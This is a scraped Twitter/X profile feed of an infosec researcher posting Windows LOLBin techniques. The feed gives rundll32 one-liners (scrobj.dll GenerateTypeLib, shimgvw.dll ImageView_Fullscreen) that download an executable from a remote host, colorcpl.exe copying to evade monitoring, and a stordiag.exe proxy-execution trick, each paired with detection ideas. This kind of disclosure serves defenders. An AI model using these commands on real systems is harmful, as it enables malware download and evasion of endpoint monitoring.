eral4m

13 posts

eral4m

eral4m

@eral4m

Infosec research.

Katılım Ekim 2021
75 Takip Edilen27 Takipçiler
eral4m
eral4m@eral4m·
@_JohnHammond Requires admin level access by default though i believe...
English
0
0
0
0
eral4m
eral4m@eral4m·
@_JohnHammond Interesting detail - in the situation where SMB is blocked, the act of searching the search-ms: link causes the files that are found in the search to be downloaded to WebDAV cache: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{UUID}.exe
English
1
0
0
0
John Hammond
John Hammond@_JohnHammond·
Since ms-msdt: is now readily detected and the conversation has changed to search-ms: and some more staggered social engineering tricks, here is a useless thread on a silly thing tricksters might be able to pull off with some of the new fun things we have learned: 🧵
English
5
74
313
0
eral4m
eral4m@eral4m·
Basic Detection: File create/file write from colorcpl.exe
Română
0
0
0
0
eral4m
eral4m@eral4m·
#lolbin / #lolbas for file copy: colorcpl.exe c:\windows\system32\calc.exe Copies file to c:\windows\system32\spool\drivers\color\calc.exe Can evasively move files out of commonly abused staging areas via a process not normally monitored. Det logic below
eral4m tweet media
English
1
2
3
0
eral4m
eral4m@eral4m·
Detection idea: rundll32.exe*GenerateTypeLib*://*
Deutsch
0
0
0
0
eral4m
eral4m@eral4m·
Downloader #lolbin #lolbas Possible new take on an old hit (can't find this referenced anywhere): rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://w.x.y.z/any.exe Downloads to: AppData\Local\Microsoft\Windows\INetCache\IE\<random>\any[1].exe
English
1
0
0
0
eral4m
eral4m@eral4m·
Basic detections ideas: rundll32.exe*ImageView_Fullscreen*://*
English
0
0
0
0
eral4m
eral4m@eral4m·
Downloader #lolbas #lolbin rundll32.exe "c:\windows\system32\shimgvw.dll",ImageView_Fullscreen http://<ip>/any.exe OR ImageView_FullscreenA will download your exe to: AppData\Local\Microsoft\Windows\INetCache\IE\<random>\any[1].exe
English
1
0
0
0
eral4m
eral4m@eral4m·
Detection for this on endpoint (EDR/Sysmon etc): Process execution of systeminfo.exe or schtasks.exe or fltmc.exe executing from a path that isn't c:\windows\system32\ or c:\windows\syswow64 with parent of stordiag.exe
English
0
0
1
0
eral4m
eral4m@eral4m·
1) Copy c:\windows\system32\stordiag.exe to a folder 2) Name arbitrary executable either: Systeminfo.exe or schtasks.exe or fltmc.exe and place in the same folder. 3) Execute stordiag.exe 4) ??? 5) Execute order 66! #lolbin
English
1
4
11
0